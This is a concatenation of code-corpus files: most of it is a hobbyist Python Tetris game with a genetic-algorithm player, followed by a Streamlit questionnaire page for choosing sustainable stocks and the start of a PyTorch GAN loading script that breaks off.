4 + dy +fxx[1]+ fx[1]) * size, anchor=NW,\r\n image=shapesimg[shapetype])\r\n for x in range(4):\r\n board[shapepoints[degree][shapetype][x] // 4 + dy +fxx[1] + fx[1]][shapepoints[degree][shapetype][x] % 4 + dx + 3 +fxx[0]+ fx[0]] = 0 - shapetype - 1\r\n # print(x)\r\n rowsfillednum = 0\r\n for x in range(boardheight):\r\n if rowfilled(x):\r\n rowsfillednum += 1\r\n totalrowsfilled += 1\r\n if totalrowsfilled % 10 == 0 and not totalrowsfilled == 0:\r\n level += 1\r\n updatelevel()\r\n delay = delay * 0.9\r\n print(\"Increasing difficulty\")\r\n for r in range(boardheight):\r\n for c in range(boardwidth):\r\n canvas.delete(shapeboard[r][c])\r\n shapeboard = np.delete(shapeboard,x,0)\r\n newrow2 = np.ndarray((1,boardwidth),dtype=PhotoImage)\r\n shapeboard = np.concatenate((newrow2,shapeboard),axis=0) # I looked on stackoverflow on how to delete rows from array\r\n #print(shapeboard)\r\n board = np.delete(board,x,0)\r\n newrow = np.zeros((1,boardwidth))\r\n board = np.concatenate((newrow, board), axis=0)\r\n # print(board)\r\n for r in range(boardheight):\r\n for c in range(boardwidth):\r\n if shapeboard[r][c] != None:\r\n shapeboard[r][c] = canvas.create_image(c * size,r * size,anchor=NW,image=shapesimg[int(-1-board[r][c])])\r\n if rowsfillednum == 1:\r\n score += 100\r\n elif rowsfillednum == 2:\r\n score += 300\r\n elif rowsfillednum == 3:\r\n score += 500\r\n elif rowsfillednum == 4:\r\n score += 800\r\n #print(score)\r\n shapetype = nextshape\r\n nextshape = random.randint(0, 6)\r\n dy = 0\r\n dx = 0\r\n degree = 0\r\n fx = np.array([0, 0])\r\n fxx = fx\r\n for x in range(boardwidth):\r\n if board[1][x] < 0:\r\n gameplaying = False\r\n return\r\n\r\n for s in nextshapes:\r\n canvas.delete(s)\r\n for s in holdshapes:\r\n canvas.delete(s)\r\n #if holding:\r\n #nextshape = random.randint(0,6)\r\n nextshapes = []\r\n holdshapes = []\r\n for x in range(4):\r\n if nextshape == 0 or nextshape == 3:\r\n nextshapes.append(canvas.create_image((shapepoints[degree][nextshape][x] % 4 + 10.5) * size,\r\n (shapepoints[degree][nextshape][x] // 4 + 10) * size, anchor=NW,\r\n image=shapesimg[nextshape]))\r\n else:\r\n nextshapes.append(\r\n canvas.create_image((shapepoints[degree][nextshape][x] % 4 + 11) * size,\r\n (shapepoints[degree][nextshape][x] // 4 + 10) * size,\r\n anchor=NW, image=shapesimg[nextshape]))\r\n for x in range(4):\r\n if holdshape == 0 or holdshape == 3:\r\n holdshapes.append(canvas.create_image((shapepoints[degree][holdshape][x] % 4 + 10.5) * size,\r\n (shapepoints[degree][holdshape][x] // 4 + 3) * size, anchor=NW,\r\n image=shapesimg[holdshape]))\r\n elif holdshape != None:\r\n holdshapes.append(\r\n canvas.create_image((shapepoints[degree][holdshape][x] % 4 + 11) * size,\r\n (shapepoints[degree][holdshape][x] // 4 + 3) * size,\r\n anchor=NW, image=shapesimg[holdshape]))\r\n\r\n shapes = []\r\n for x in range(4):\r\n shapes.append(\r\n canvas.create_image((shapepoints[degree][shapetype][x] % 4 + 3) * size, shapepoints[degree][shapetype][x] // 4 * size,\r\n anchor=NW, image=shapesimg[shapetype]))\r\n board[shapepoints[degree][shapetype][x] // 4][shapepoints[degree][shapetype][x] % 4 + 3] = shapetype + 1\r\n updatescore()\r\n\r\ndef rowfilled(row):\r\n for x in range(boardwidth):\r\n if board[row][x] == 0:\r\n return False\r\n return True\r\n\r\ndef updatelevel():\r\n global levelimage\r\n canvas.delete(levelimage)\r\n levelimage = canvas.create_text(500,650,font=\"Times 20 italic bold\", #I took this off of stackoverflow\r\n text=str(level))\r\n\r\ndef updatescore():\r\n global scoreimage\r\n canvas.delete(scoreimage)\r\n scoreimage = canvas.create_text(500,750,font=\"Times 20 italic bold\", #same thing as above\r\n text=str(score))\r\ndef move(event):\r\n global i,dy,dx,degree,fx,rotation\r\n # print(board)\r\n if not gameplaying:\r\n return\r\n if event.keysym == \"Up\":\r\n rotation = 1\r\n rotate()\r\n elif event.keysym == \"z\":\r\n rotation = -1\r\n rotate()\r\n elif event.keysym == \"Down\":\r\n downinput(pressed = True)\r\n elif event.keysym == \"Left\":\r\n leftinput()\r\n elif event.keysym == \"Right\":\r\n rightinput()\r\n\r\ndef downinput(pressed):\r\n global dy,score,fx\r\n score += 1\r\n updatescore()\r\n #fx = np.array([0, 0])\r\n if not gameplaying:\r\n return\r\n if not valid(1):\r\n #time.sleep(3)\r\n newshape(False)\r\n dy -= 1\r\n dy +=1\r\n for s in shapes:\r\n canvas.delete(s)\r\n\r\n for x in range(boardheight):\r\n for y in range(boardwidth):\r\n if board[x][y] > 0:\r\n board[x][y] = 0\r\n for x in range(4):\r\n board[shapepoints[degree][shapetype][x] // 4 + dy + fxx[1]+ fx[1]][shapepoints[degree][shapetype][x] % 4 + dx + 3 +fxx[0]+ fx[0]] = shapetype + 1\r\n\r\n for x in range(4):\r\n shapes[x] = canvas.create_image((shapepoints[degree][shapetype][x] % 4 + dx + 3 +fxx[0]+ fx[0]) * size, (shapepoints[degree][shapetype][x] // 4 + dy+fxx[1] + fx[1]) * size, anchor=NW,\r\n image=shapesimg[shapetype])\r\n if not pressed:\r\n win.after(int(delay),downinput,False) #stackoverflow window bind repeat/loop\r\n # print(board)\r\n\r\ndef leftinput():\r\n global dx\r\n if not valid(2):\r\n return\r\n for s in shapes:\r\n canvas.delete(s)\r\n dx -= 1\r\n\r\n for x in range(boardheight):\r\n for y in range(boardwidth):\r\n if board[x][y] > 0:\r\n board[x][y] = 0\r\n for x in range(4):\r\n board[shapepoints[degree][shapetype][x] // 4 + dy +fxx[1]+ fx[1]][shapepoints[degree][shapetype][x] % 4 + dx + 3 +fxx[0]+ fx[0]] = shapetype + 1\r\n\r\n for x in range(4):\r\n shapes[x] = canvas.create_image((shapepoints[degree][shapetype][x] % 4 + dx + 3 +fxx[0]+ fx[0]) * size,\r\n (shapepoints[degree][shapetype][x] // 4 + dy +fxx[1]+ fx[1]) * size, anchor=NW,\r\n image=shapesimg[shapetype])\r\n # print(board)\r\n\r\ndef rightinput():\r\n global dx\r\n if not valid(3):\r\n return\r\n for s in shapes:\r\n canvas.delete(s)\r\n dx += 1\r\n\r\n for x in range(boardheight):\r\n for y in range(boardwidth):\r\n if board[x][y] > 0:\r\n board[x][y] = 0\r\n\r\n for x in range(4):\r\n board[shapepoints[degree][shapetype][x] // 4 + dy +fxx[1]+ fx[1]][shapepoints[degree][shapetype][x] % 4 + dx + 3 + fxx[0] +fx[0]] = shapetype + 1\r\n\r\n for x in range(4):\r\n shapes[x] = canvas.create_image((shapepoints[degree][shapetype][x] % 4 + dx + 3 +fxx[0]+ fx[0]) * size,\r\n (shapepoints[degree][shapetype][x] // 4 + dy + fxx[1] + fx[1]) * size, anchor=NW,\r\n image=shapesimg[shapetype])\r\n # print(board)\r\n\r\ndef rotatevalid():#points,offset):\r\n if shapetype == 0:\r\n return\r\n for x in range(4):\r\n newx = (shapepoints[degree][shapetype][x] % 4 + dx + 3 + fx[0] + fxx[0]) * size #from here to the last comment was code I converted from the Tetris rotation video to python\r\n newy = (shapepoints[degree][shapetype][x] // 4 + dy + fx[1] + fxx[1]) * size #i looked on stackoverflow for numpy array code\r\n a = np.array([[newx], [newy]])\r\n p = np.array([[(shapepoints[degree][shapetype][pivotpoints[shapetype - 1][degree] - 1] % 4 + dx + 3 + fx[0] + fxx[0]) * size],\r\n [(shapepoints[degree][shapetype][pivotpoints[shapetype - 1][degree] - 1] // 4 + dy + fx[1] + fxx[1]) * size]])\r\n # print(p)\r\n a = a - p\r\n b = np.array([[0, -1 * rotation], [1 * rotation, 0]]) #matrix from video\r\n c = np.dot(b, a) + p # hereeeeeeeeeeeeeeeeeeeeeeeeeeee\r\n if shapetype == 3:\r\n if degree == 0:\r\n c[1][0] += 40\r\n elif degree == 1:\r\n c[0][0] -= 40\r\n elif degree == 2:\r\n c[0][0] -= 40\r\n elif degree == 3:\r\n c[1][0] -= 40\r\n if c[0][0] > 399 or c[0][0] < -1:\r\n return False\r\n if c[1][0] > 799:\r\n return False\r\n if board[int(c[1][0] / 40)][int(c[0][0] / 40)] < 0:\r\n return False\r\n return True\r\n\r\ndef offset(): #this is mostly from video\r\n global rotationdx,canrotate,fx,dx,fxx\r\n if shapetype == 0:\r\n return\r\n canrotate = False #not mine\r\n lastdx = degree #not mine\r\n rotationdx = (degree + 1 * rotation) % 4 #not mine\r\n # print(\"attempting offset\")\r\n #fx = np.array([0, 0])\r\n # print(degree)\r\n # print(fx)\r\n fxx += fx\r\n if shapetype == 3: #this too\r\n offsetdata = offsetI #and this\r\n else:\r\n offsetdata = offsetnormal #and this\r\n for x in range(5): #this whole loop isnt mine\r\n bx = np.array([offsetdata[x][lastdx][0],offsetdata[x][lastdx][1]])\r\n #print(bx)\r\n cx = np.array([offsetdata[x][rotationdx][0],offsetdata[x][rotationdx][1]])\r\n fx = np.subtract(bx,cx)\r\n # print(fx)\r\n if rotatevalid():\r\n canrotate = True\r\n # print(\"nice\")\r\n break\r\n #print(board)\r\n return canrotate\r\n\r\ndef rotate():\r\n global degree,fx,dx\r\n if shapetype == 0:\r\n return\r\n if rotatevalid():\r\n poop = 0\r\n elif offset():\r\n poop = 0\r\n else:\r\n return\r\n for x in range(boardheight):\r\n for y in range(boardwidth):\r\n if board[x][y] > 0:\r\n board[x][y] = 0\r\n #for x in range(4):\r\n #board[shapepoints[degree][shapetype][x] // 4 + dy + fx[1]][shapepoints[degree][shapetype][x] % 4 + dx + 3 + fx[0]] = 0\r\n # print(board)\r\n #board[shapepoints[shapetype][x] % 4 + dx + 3][shapepoints[shapetype][x] // 4 + dy] = 10\r\n #print(board)\r\n for x in range(4):\r\n newx = (shapepoints[degree][shapetype][x] % 4 + dx + 3 +fxx[0] + fx[0]) * size #not my idea\r\n newy = (shapepoints[degree][shapetype][x] // 4 + dy + fxx[1] +fx[1]) * size #from video\r\n\r\n a = np.array([[newx], [newy]]) #from video\r\n p = np.array([[(shapepoints[degree][shapetype][pivotpoints[shapetype - 1][degree] - 1] % 4 + dx + 3 +fxx[0]+ fx[0]) * size],\r\n [(shapepoints[degree][shapetype][pivotpoints[shapetype - 1][degree] - 1] // 4 + dy +fxx[1] + fx[1]) * size]]) #from video\r\n # print(p)\r\n a = a - p #from video\r\n b = np.array([[0, -1 * rotation], [1 * rotation, 0]]) #from video\r\n c = np.dot(b, a) + p #from video\r\n if shapetype == 3:\r\n if degree == 0:\r\n c[1][0] += 40\r\n elif degree == 1:\r\n c[0][0] -= 40\r\n elif degree == 2:\r\n c[0][0] -= 40\r\n elif degree == 3:\r\n c[1][0] -= 40\r\n # print(c[1][0])\r\n board[int((c[1][0])/ 40)][int((c[0][0])/ 40)] = shapetype + 1\r\n # print(board)\r\n #if offset():\r\n canvas.delete(shapes[x])\r\n shapes[x] = canvas.create_image(c[0][0], c[1][0], anchor=NW,\r\n image=shapesimg[shapetype])\r\n # print(board)\r\n #fx = np.array([0, 0])\r\n degree = (degree + 1 * rotation) % 4\r\n\r\ndef valid(dir): #up,down,left,right\r\n px = 0\r\n py = 0\r\n if dir == 1:\r\n py = dy + 1\r\n px = dx\r\n elif dir == 2:\r\n px = dx - 1\r\n elif dir == 3:\r\n px = dx + 1\r\n\r\n a = 0\r\n for x in range(4):\r\n if shapepoints[degree][shapetype][x] // 4 + dy +fxx[1]+ fx[1] > boardheight-1:\r\n return False\r\n if shapepoints[degree][shapetype][x] // 4 + py + fxx[1] + fx[1] > boardheight - 1:\r\n return False\r\n if shapepoints[degree][shapetype][x] % 4 + px + 2 + fx[0] + fxx[0]< -1 or shapepoints[degree][shapetype][x] % 4 + px + 1 + fxx[0] + fx[0] > 7:\r\n return False\r\n if (dir == 0 or dir == 1) and board[shapepoints[degree][shapetype][x] // 4 + py +fxx[1] +fx[1]][shapepoints[degree][shapetype][x] % 4 + 3 + dx +fxx[0]+ fx[0]] < 0:\r\n return False\r\n if (dir == 2 or dir == 3) and board[shapepoints[degree][shapetype][x] // 4 + dy +fxx[1]+ fx[1]][shapepoints[degree][shapetype][x] % 4 + 3 + px +fxx[0]+ fx[0]] < 0:\r\n return False\r\n return True\r\n\r\ndef hold(event):\r\n global holdshape,shapetype,held,nextshape\r\n if holdshape == None:\r\n holdshape = shapetype\r\n shapetype = nextshape\r\n nextshape = random.randint(0, 6)\r\n held = True\r\n for s in shapes:\r\n canvas.delete(s)\r\n newshape(True)\r\n elif not held:\r\n temp = holdshape\r\n holdshape = shapetype\r\n shapetype = temp\r\n held = True\r\n for s in shapes:\r\n canvas.delete(s)\r\n newshape(True)\r\n\r\ndef x(event):\r\n global board\r\n evaluate()\r\n\r\ndef placeblocks(event):\r\n if board[event.y//40][event.x//40] == 0:\r\n shapeboard[event.y//40][event.x//40] = canvas.create_image(event.x // 40* size,event.y//40* size, anchor=NW,image=shapesimg[0])\r\n board[event.y//40][event.x//40] = -10\r\n #print(board)\r\n elif board[event.y//40][event.x//40] == -10:\r\n canvas.delete(shapeboard[event.y//40][event.x//40])\r\n board[event.y // 40][event.x // 40] = 0\r\n #print(board)\r\n\r\nwwidth = 600\r\nwheight = 800\r\nwin = Tk()\r\nwin.title('Tetris')\r\nwin.resizable(0,0)\r\ncanvas = Canvas(win, width=wwidth, height = wheight,bg = \"gray\",borderwidth=0,highlightthickness=0)\r\nwin.bind('', move)\r\nwin.bind(\"c\", hold)\r\nwin.bind('', x)\r\ncanvas.bind('', placeblocks)\r\ncanvas.pack()\r\n\r\nboardwidth = 10\r\nboardheight = 20\r\nsize = wheight/boardheight\r\ngameplaying = True\r\ndx = 0\r\ndy = 0\r\ntoplayerblock = False\r\nshapetype = random.randint(0,6)\r\nnextshape = random.randint(0,6)\r\ndelay = 750\r\ndegree = 0\r\nholdshape = None\r\nheld = False\r\nrotationdx = 0\r\nrotation = 1\r\ncanrotate = False\r\nfx = np.array([0,0])\r\nfxx = fx\r\noffsetrotate = 0\r\nscore = 0\r\ntotalrowsfilled = 0\r\nlevel = 1\r\nlevelimage = canvas.create_text(500,650,font=\"Times 20 italic bold\", #tooken from the stackoverflow\r\n text=str(level))\r\nscoreimage = canvas.create_text(500,750,font=\"Times 20 italic bold\", #tooken\r\n text=str(score))\r\n\r\nboard = np.zeros((boardheight,boardwidth)) #numpy stuff I looked up\r\nshapeboard = np.ndarray((boardheight,boardwidth),dtype=PhotoImage) #more stuff\r\n\r\nfor y in range(boardheight):\r\n canvas.create_line(0,y*(wheight/boardheight), (wheight/boardheight) * (boardwidth),y*(wheight/boardheight))\r\nfor x in range(boardwidth):\r\n canvas.create_line((x+1) * (wheight/boardheight),0,(x+1)*(wheight/boardheight),wheight)\r\n\r\ntiles = Image.open(\"tiles.jpg\") #I looked up how to import images\r\ntiles = tiles.resize((280,40), Image.ANTIALIAS)\r\nshapesimg = [\r\n ImageTk.PhotoImage(tiles.crop((0,0,size,size))), #O [0]\r\n ImageTk.PhotoImage(tiles.crop((size,0,size * 2,size))), #S [1]\r\n ImageTk.PhotoImage(tiles.crop((size * 2,0,size * 3,size))), #T [2]\r\n ImageTk.PhotoImage(tiles.crop((size * 3,0,size * 4,size))), #I [3]\r\n ImageTk.PhotoImage(tiles.crop((size * 4, 0, size * 5, size))), #Z [4]\r\n ImageTk.PhotoImage(tiles.crop((size * 5,0,size * 6,size))), #L [5]\r\n ImageTk.PhotoImage(tiles.crop((size * 6,0,size * 7,size))), #J [6]\r\n ]\r\nshapepoints = [[[1,2,5,6], #O #coordinate system I took from C++ video\r\n [1,2,4,5], #S\r\n [1,4,5,6],#T\r\n [4,5,6,7],#I\r\n [0,1,5,6],#Z\r\n [2,4,5,6],#L\r\n [0,4,5,6]],#J\r\n [[1,2,5,6], #O\r\n [1,5,6,10],#S\r\n [1,5,6,9], #T\r\n [2,6,10,14], #I\r\n [2,5,6,9],#Z\r\n [1,5,9,10],#L\r\n [1,2,5,9]],#J\r\n [[1,2,5,6],#O\r\n [5,6,8,9],#S\r\n [4,5,6,9],#T\r\n [8,9,10,11],#I\r\n [4,5,9,10],#Z\r\n [4,5,6,8],#L\r\n [4,5,6,10]],#J\r\n [[1,2,5,6],\r\n [0,4,5,9],\r\n [1,4,5,9],\r\n [1,5,9,13],\r\n [1,4,5,8],\r\n [0,1,5,9],\r\n [1,5,8,9]]\r\n]\r\nshapes = []\r\nfor x in range(4):\r\n shapes.append(canvas.create_image((shapepoints[0][shapetype][x] % 4 + 3) * size,shapepoints[0][shapetype][x] // 4* size,anchor=NW,image= shapesimg[shapetype]))\r\n board[shapepoints[0][shapetype][x] // 4][shapepoints[0][shapetype][x] % 4 + 3] = shapetype + 1\r\n\r\npivotpoints = [[4,2,1,3], #S #I got idea of pivot points from tetris rotation video\r\n [3,2,2,3],#T\r\n [3,3,3,3],#I\r\n [3,2,2,3],#Z\r\n [3,2,2,3],#L\r\n [3,3,2,2]#J\r\n]\r\noffsetnormal = [[(0,0),(0,0),(0,0),(0,0)], #tetris rotation video the long\r\n [(0,0),(1,0),(0,0),(-1,0)],\r\n [(0,0),(1,1),(0,0),(-1,1)],\r\n [(0,0),(0,-2),(0,0),(0,-2)],\r\n [(0,0),(1,-2),(0,0),(-1,-2)]]\r\n\r\noffsetI = [[(0,0),(-1,0),(-1,-1),(0,-1)], #also from the long video\r\n [(-1,0),(0,0),(1,-1),(0,-1)],\r\n [(2,0),(0,0),(-2,-1),(0,-1)],\r\n [(-1,0),(0,-1),(1,0),(0,1)],\r\n [(2,0),(0,2),(-2,0),(0,-2)]]\r\n#print(offsetnormal[0][0][0])\r\nnextshapes = []\r\nholdshapes = []\r\nfor x in range(4):\r\n if nextshape == 0 or nextshape == 3:\r\n nextshapes.append(canvas.create_image((shapepoints[0][nextshape][x] % 4 + 10.5) * size,(shapepoints[0][nextshape][x] // 4 + 10)* size,anchor=NW,image= shapesimg[nextshape]))\r\n else:\r\n nextshapes.append(\r\n canvas.create_image((shapepoints[0][nextshape][x] % 4 + 11) * size, (shapepoints[0][nextshape][x] // 4 + 10) * size,\r\n anchor=NW, image=shapesimg[nextshape]))\r\n#start()\r\ncanvas.create_text(500,600,font=\"Times 20 italic bold\",\r\n text=\"Level\")\r\ncanvas.create_text(500,700,font=\"Times 20 italic bold\",\r\n text=\"Score\")\r\nimagenext = ImageTk.PhotoImage(Image.open(\"next.jpg\"))\r\ncanvas.create_image(500,320,image=imagenext)\r\nimagehold = ImageTk.PhotoImage(Image.open(\"hold.jpg\"))\r\ncanvas.create_image(500,50,image=imagehold)\r\nwin.after(int(delay),downinput,False)\r\n#print(board)\r\n\r\npopsize = 50 ##########################################I wish I spent more time on this AI. It would've been cool but I spent soooo much time bugfixing the game also this is taken from video\r\ngeneration = 1 #took from AI video\r\nmutrate = 0.02\r\ndata = {} #look uped how to do JSON file stuff\r\nstartboard = np.zeros((boardheight,boardwidth))\r\ngenerationindex = 0 #Took from video\r\nmaxmoves = 500 #took\r\nfitness = 0 #took\r\nparents = []\r\nfit = 0\r\ndef createchildren(): #took this method\r\n global data\r\n usechildren = False\r\n data['population'] = []\r\n if usechildren:\r\n usechild()\r\n else:\r\n for x in range(popsize): #this loop has stuff from the AI website and video\r\n data['population'].append({\r\n 'id': random.random(), #video\r\n 'generation': generation, #video\r\n 'rowsfilled': random.random(), #video\r\n 'totalheightcols': random.random() - 0.5, #website\r\n 'numholes': random.random() - 0.5, #website\r\n 'rigidness': random.random() - 0.5, #both\r\n 'fitness': 0\r\n })\r\n with open('data.json', 'w') as outfile:\r\n json.dump(data, outfile, indent=1)\r\n evaluate()\r\n\r\ndef usechild():\r\n global data,generation\r\n for x in range(5):\r\n data['population'].append({\r\n 'id': 0.8836908404702061,\r\n 'generation': 26,\r\n 'rowsfilled': 0.030591430497130742,\r\n 'totalheightcols': 0.006961037706044365,\r\n 'numholes': 0.0205583135684244,\r\n 'rigidness': -0.007101190397666102,\r\n 'fitness': 0\r\n })\r\n data['population'].append({\r\n 'id': 0.4660794728013691,\r\n 'generation': 33,\r\n 'rowsfilled': 0.03370574434981557,\r\n 'totalheightcols': 0.024891259604550138,\r\n 'numholes': 0.000688213250719727,\r\n 'rigidness': 0.020569918960131953,\r\n 'fitness': 0\r\n })\r\n with open('data.json', 'w') as outfile:\r\n json.dump(data, outfile, indent=1)\r\n #for x in range(50):\r\n evaluate()\r\n\r\n\r\ndef ai(event):\r\n moveblocks()\r\n\r\nwin.bind(\"a\", ai)\r\ndef getrowsfilled():\r\n return totalrowsfilled + 1\r\n\r\ndef gettotalheightcols(): #this method is taken from the website's source code\r\n totalheight = 0\r\n for x in range(boardwidth):\r\n for y in range(boardheight):\r\n if board[y][x] < 0:\r\n totalheight += 1\r\n return totalheight\r\ndef getnumholes(): #this method is also taken from source code\r\n numholes = 0\r\n for y in range(boardwidth):\r\n hashole = False\r\n for x in range(boardheight):\r\n if board[x][y] < 0:\r\n hashole = True\r\n elif board[x][y] == 0 and hashole:\r\n numholes += 1\r\n return numholes\r\n\r\ndef getrigidness(): #taken from website also\r\n\r\n def getcolheight(col):\r\n height = 0\r\n for x in range(boardheight):\r\n if board[x][col] < 0:\r\n height += 1\r\n return height\r\n\r\n rigidness = 0\r\n for x in range(boardwidth-1):\r\n rigidness += abs(getcolheight(x) - getcolheight(x + 1))\r\n return rigidness\r\ndef getallmoves():\r\n global board,shapes,dy,dx,fx,fxx,degree,score,fitness,shapeboard\r\n moverating = 0 #Takaen from website\r\n bestmove = -69696969 #taken from website\r\n testboard = board.copy() #stackoverflow\r\n testshapes = shapes.copy() #same as above\r\n savedscore = score\r\n fitness = score\r\n moveset = []\r\n # print(moveset.shape)\r\n for rotations in range(4): #this whole loop is taken from AI video\r\n for x in range(-5,6):\r\n board = testboard.copy()\r\n for k in range(rotations):\r\n rotate()\r\n # print(board)\r\n if x < 0:\r\n for i in range(abs(x)):\r\n leftinput()\r\n # print(board)\r\n elif x > 0:\r\n for j in range(x):\r\n rightinput()\r\n # print(board)\r\n while valid(1):\r\n downinput(True)\r\n #print(board)\r\n moverating += getrowsfilled() * rowsfilled\r\n moverating += gettotalheightcols() * totalheightcols\r\n moverating += getnumholes() * numholes\r\n moverating += getrigidness() * rigidness\r\n if not gameplaying:\r\n moverating -= 500\r\n if moverating > bestmove:\r\n bestmove = moverating\r\n moveset = [rotations,x]\r\n # print(bestmove)\r\n moverating = 0\r\n #print(bestmove)\r\n #print(board)\r\n board = testboard.copy()\r\n dy = 0#this is reset feature that I kinda took and recoded\r\n dx = 0 #\r\n fxx = np.array([0,0]) #\r\n fx = np.array([0,0]) #\r\n degree = 0 #\r\n shapeboard = np.ndarray((boardheight, boardwidth), dtype=PhotoImage) #\r\n score = savedscore\r\n # shapes = testshapes\r\n #newshape(False)\r\n #print(moveset)\r\n return moveset\r\ndef moveblocks():\r\n moves = getallmoves()\r\n for r in range(int(moves[0])):\r\n rotate()\r\n for x in range(abs(int(moves[1]))):\r\n #print(moves[1])\r\n if moves[1] < 0:\r\n leftinput()\r\n elif moves[1] > 0:\r\n rightinput()\r\n while valid(1):\r\n downinput(True)\r\n newshape(False)\r\ndef restartgame(): #idea taken from AI video\r\n global board,dy,dx,fxx,fx,degree,gameplaying,score,shapeboard\r\n board = startboard.copy()\r\n dy = 0\r\n dx = 0\r\n fxx = np.array([0, 0])\r\n fx = np.array([0, 0])\r\n degree = 0\r\n score = 0\r\n gameplaying = True\r\n shapeboard = np.ndarray((boardheight, boardwidth), dtype=PhotoImage)\r\n#def mutate():\r\n # if random.random < mutrate\r\ndef mate(): #taken from video\r\n def getrandomparengenes(): #from AI video\r\n num = random.randint(0,1)\r\n if num == 1:\r\n return 1\r\n else:\r\n return 0\r\n\r\n global data,fit\r\n yourmom = []\r\n yourdad = []\r\n mychildren = []\r\n with open(\"data.json\", \"r\") as p:\r\n temp = json.load(p)\r\n for x in range(popsize): ##Idea came from video but I couldn't code it myself\r\n print(x - 1 + (generation - 2) * 10)\r\n if int(temp['population'][x + (generation - 2) * 10]['fitness']) > fit:\r\n fit = int(temp['population'][x + (generation - 2) * 10]['fitness'])\r\n print(fit)\r\n parents.append(x - 1 + (generation - 2) * 10)\r\n for x in range(popsize):#writing json stuff from stackoverflow\r\n temp['population'].append({\r\n 'id': random.random(),\r\n 'generation': generation,\r\n 'rowsfilled': temp['population'][len(parents) - 1 - getrandomparengenes()]['rowsfilled'] * mutrate,\r\n 'totalheightcols': temp['population'][len(parents) - 1 - getrandomparengenes()]['totalheightcols'] * mutrate,\r\n 'numholes': temp['population'][len(parents) - 1 - getrandomparengenes()]['numholes'] * mutrate,\r\n 'rigidness': temp['population'][len(parents) - 1 - getrandomparengenes()]['rigidness'] * mutrate,\r\n 'fitness': 0\r\n })\r\n #print(temp['population'][x+10])\r\n with open(\"data.json\", \"w\") as p: #stackoverflow\r\n json.dump(temp, p,indent=1)\r\n print(parents)\r\n data = temp\r\n\r\ndef evaluate():\r\n global rowsfilled,totalheightcols,numholes,rigidness,data,fitness,generationindex,generation\r\n # print(shapeboard)\r\n if generationindex % popsize == 0 and generationindex != 0:\r\n print(\"Generation done\")\r\n generation += 1\r\n mate()\r\n if generation == 500:\r\n return\r\n print(\"Poplation\" + str(generationindex))\r\n\r\n fitness = 0\r\n rowsfilled = float(data['population'][generationindex]['rowsfilled'])\r\n totalheightcols = float(data['population'][generationindex]['totalheightcols'])\r\n numholes = float(data['population'][generationindex]['numholes'])\r\n rigidness = float(data['population'][generationindex]['rigidness'])\r\n while gameplaying:\r\n moveblocks()\r\n restartgame()\r\n with open(\"data.json\", \"r\") as p: # #stackoverflow/website reading json file\r\n tempdata = json.load(p)\r\n # print(tempdata['population'][generationindex])\r\n\r\n tempdata['population'][generationindex]['fitness'] = fitness\r\n with open(\"data.json\", \"w\") as p:\r\n json.dump(tempdata, p,indent=1)\r\n data = tempdata\r\n print(tempdata['population'][generationindex]['fitness'])\r\n generationindex += 1\r\n evaluate()\r\nrowsfilled = 0 #variables from AI video and website\r\ntotalheightcols = 0\r\nnumholes = 0\r\nrigidness = 0\r\n\r\n#createchildren()\r\nwin.mainloop()","repo_name":"BokChoyBoys/Tetris","sub_path":"Tester.py","file_name":"Tester.py","file_ext":"py","file_size_in_byte":28639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37221440628","text":"# This is the questionnaire page (to be completed)\n\nimport streamlit as st\nimport questionnaire_data as qd\n\n\ndef app(container, status):\n\n # Only run this if the app is in the questionnaire phase\n if status == 0:\n # Introduction\n container.markdown('

Sustainable investment suggestions in 2 steps

', unsafe_allow_html=True)\n container.markdown('

We know that finding suitable sustainable stocks to invest in can be a daunting task. That’s why we offer GreenBear. Fill in your preferred sectors and priorities and we will provide you with a list of stocks to match. Start below:

', unsafe_allow_html=True)\n # question container\n questions = container.beta_container()\n\n # Question 1: select industries\n questions.markdown('

STEP 1. Select sectors you have affinity with:

', unsafe_allow_html=True)\n\n # Option 1: load categories from csv file\n sector_industries = qd.load_sectors_industries_csv('data/company_industry_sector.csv', 1, 3, 7)\n selected_sectors = []\n\n #split sectors into 2 lists for 2 columns\n s1, s2, s3 =qd.split_list(sector_industries, 3)\n #split into 2 columns\n c1, c2, c3 = questions.beta_columns(3)\n # Add checkbox for each category\n #category_boxes = [questions.checkbox(sector, key=sector) for sector in [sector_industries[x][0] for x in range(len(sector_industries))]]\n\n\n check1=[c1.checkbox(s1, key=s1) for s1 in [s1[x][0] for x in range(len(s1))] ]\n check2=[c2.checkbox(s2, key=s2) for s2 in [s2[x][0] for x in range(len(s2))] ]\n check3=[c3.checkbox(s3, key=s3) for s3 in [s3[x][0] for x in range(len(s3))] ]\n\n category_boxes=[check1, check2, check3]\n # Question 2: select sustainability priorities\n questions.markdown('

STEP 2. Select your sustainability priorities:

', unsafe_allow_html=True)\n # Add options for question 2\n selected_priority = questions.radio('',['Environmental sustainability',\n 'Social sustainability', 'Governance sustainability', 'Total sustainability'])\n\n # Translate selected option to table column name\n if selected_priority == 'Environmental sustainability':\n selected_priority = 'environmentScore'\n elif selected_priority == 'Social sustainability':\n selected_priority = 'socialScore'\n elif selected_priority == 'Governance sustainability':\n selected_priority = 'governanceScore'\n elif selected_priority == 'Total sustainability':\n selected_priority = 'totalEsg'\n\n # Add confirm button\n if questions.button('Confirm Selection'):\n questions.write('Selection confirmed')\n selected_sectors = [sector for sector, checked in zip([sector[0] for sector in sector_industries], category_boxes) if checked]\n selected_industries = qd.get_industries_from_sectors(sector_industries, selected_sectors)\n\n # If the confirm button is clicked return status 1, so that the\n # app moves on to the results\n return selected_industries, selected_priority, 1\n else:\n return [], '', 0\n","repo_name":"DSCS-A4/sustainability","sub_path":"questionnaire.py","file_name":"questionnaire.py","file_ext":"py","file_size_in_byte":3250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73738379450","text":"import logging\nimport operator\n\nimport itertools\nimport os\nimport numpy as np\nfrom typing import Tuple\n\nimport torch\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\nfrom functools import reduce\n\nfrom data_loader import (\n AmericanNationalCorpusDataset,\n ObliterateLetters,\n ToTensor,\n)\nfrom src.discriminator_net import DiscriminatorNet\nfrom src.generator_net import GeneratorNet\n\n\ndef load_models(args, config, device='cpu') -> Tuple[\n GeneratorNet, DiscriminatorNet]:\n generator = GeneratorNet(config).to(device)\n generator.load_state_dict(\n torch.load(\n os.path.join(\n args.path_to_checkpoints,\n f'epoch_{args.epoch_num}_generator.pt'\n ),\n map_location=device\n )\n )\n generator.eval()\n\n discriminator = DiscriminatorNet(config).to(device)\n 